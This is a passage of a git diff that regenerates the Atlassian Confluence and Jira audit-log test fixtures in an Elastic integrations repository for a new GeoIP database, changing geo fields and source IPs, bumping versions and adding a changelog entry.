"ingested": "2021-12-08T15:09:09.045219932Z", + "ingested": "2021-12-14T14:34:52.859172580Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"-1\",\"name\":\"System\",\"type\":\"system\"},\"changedValues\":[{\"i18nKey\":\"atlassian.audit.event.change.retention\",\"key\":\"Retention\",\"to\":\"3 Years\"}],\"extraAttributes\":[],\"method\":\"System\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":615000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5599,20 +5263,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5620,7 +5278,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:09:09.045221617Z", + "ingested": "2021-12-14T14:34:52.859172937Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"57\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 57\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:43:22.615Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624653,\"nano\":873000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5687,20 +5345,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5708,7 +5360,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:09:09.045223290Z", + "ingested": "2021-12-14T14:34:52.859173297Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:44:13.873Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 58\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-22T23:47:20.782708Z;\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"58\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624840,\"nano\":815000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5766,20 +5418,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5787,7 +5433,7 @@ }, "event": { "action": "audit.logging.summary.global.settings.edited", - "ingested": "2021-12-08T15:09:09.045224962Z", + "ingested": "2021-12-14T14:34:52.859173657Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Global settings changed\",\"actionI18nKey\":\"audit.logging.summary.global.settings.edited\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global Administration\",\"categoryI18nKey\":\"audit.logging.category.admin\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Custom contact admin message\",\"key\":\"Custom contact admin message\",\"to\":\"Please enter information about your request for the site administrators. If you are reporting an error please be sure you include information on what you were doing and the time the problem occurred.\"},{\"from\":\"Confluence\",\"i18nKey\":\"Site title\",\"key\":\"Site title\",\"to\":\"Confluence Test\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624990,\"nano\":382000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5870,20 +5516,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5891,7 +5531,7 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-08T15:09:09.045226651Z", + "ingested": "2021-12-14T14:34:52.859174030Z", "original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"Another User\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"Another User\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"another.user@example.como\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"another.user\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":842000000},\"version\":\"1.0\"}", "type": [ "user", @@ -5966,20 +5606,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5987,7 +5621,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:09:09.045228322Z", + "ingested": "2021-12-14T14:34:52.859174383Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":966000000},\"version\":\"1.0\"}", "type": [ "group", @@ -6061,20 +5695,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6082,7 +5710,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:09:09.045229993Z", + "ingested": "2021-12-14T14:34:52.859174751Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625032,\"nano\":205000000},\"version\":\"1.0\"}", "type": [ "group", @@ -6162,20 +5790,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6183,7 +5805,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:09:09.045231674Z", + "ingested": "2021-12-14T14:34:52.859175135Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"63\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 63\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:50:32.205Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625035,\"nano\":770000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" diff --git a/packages/atlassian_confluence/manifest.yml b/packages/atlassian_confluence/manifest.yml index 9a59aee2d1a..6497ffe47d7 100644 --- a/packages/atlassian_confluence/manifest.yml +++ b/packages/atlassian_confluence/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_confluence title: Atlassian Confluence -version: 1.0.0 +version: 1.0.1 license: basic description: Collect logs from Atlassian Confluence with Elastic Agent. type: integration diff --git a/packages/atlassian_jira/_dev/deploy/docker/files/config.yml b/packages/atlassian_jira/_dev/deploy/docker/files/config.yml index 0a4d89e405a..95e091754ad 100644 --- a/packages/atlassian_jira/_dev/deploy/docker/files/config.yml +++ b/packages/atlassian_jira/_dev/deploy/docker/files/config.yml @@ -22,4 +22,4 @@ rules: responses: - status_code: 200 body: |- - {"entities":[{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]},{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z"}]}],"pagingInfo":{"nextPageOffset":0,"nextPageCursor":"1637539714166,47","nextPageLink":"http://{{ hostname }}:{{ env "PORT" }}/rest/auditing/1.0/events?offset=0&limit=2&pageCursor=1637539714166,47","lastPage":false,"size":2}} + {"entities":[{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]},{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z"}]}],"pagingInfo":{"nextPageOffset":0,"nextPageCursor":"1637539714166,47","nextPageLink":"http://{{ hostname }}:{{ env "PORT" }}/rest/auditing/1.0/events?offset=0&limit=2&pageCursor=1637539714166,47","lastPage":false,"size":2}} diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml index e894d124588..b1ba3f43908 100644 --- a/packages/atlassian_jira/changelog.yml +++ b/packages/atlassian_jira/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: Initial draft of the package diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log index 171fe495c95..2f3d21750a3 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log @@ -1,5 +1,5 @@ -{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]} -{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z"}]} +{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]} +{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z"}]} {"timestamp":"2021-11-22T00:34:23.154Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"personal.access.tokens.audit.log.category","category":"Security","actionI18nKey":"personal.access.tokens.audit.log.summary.token.created","action":"Personal access token created"},"affectedObjects":[{"name":"test.user","type":"User","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","id":"JIRAUSER10000"}],"changedValues":[],"source":"10.50.33.72","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"personal.access.tokens.audit.log.extra.attribute.name","name":"Token Name","value":"asdf"}]} {"timestamp":"2021-11-22T00:32:20.234Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"10.50.33.72","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"1 - 40"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"40"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:33.746Z"}]} {"timestamp":"2021-11-22T00:31:52.991Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"10.50.33.72","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"41 - 90"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:33.887Z - 2021-11-22T00:31:37.412Z"}]} diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index c378a10ee48..3a1ea7accb0 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -13,7 +13,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { @@ -21,27 +21,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590166171Z", - "original": "{\"timestamp\":\"2021-11-22T00:34:47.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"45 - 94\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z\"}]}", + "ingested": "2021-12-15T09:00:40.254592510Z", + "original": "{\"timestamp\":\"2021-11-22T00:34:47.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"45 - 94\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z\"}]}", "type": "info", "kind": "event" }, @@ -98,7 +95,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { @@ -106,27 +103,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590196558Z", - "original": "{\"timestamp\":\"2021-11-22T00:34:40.008Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"44 - 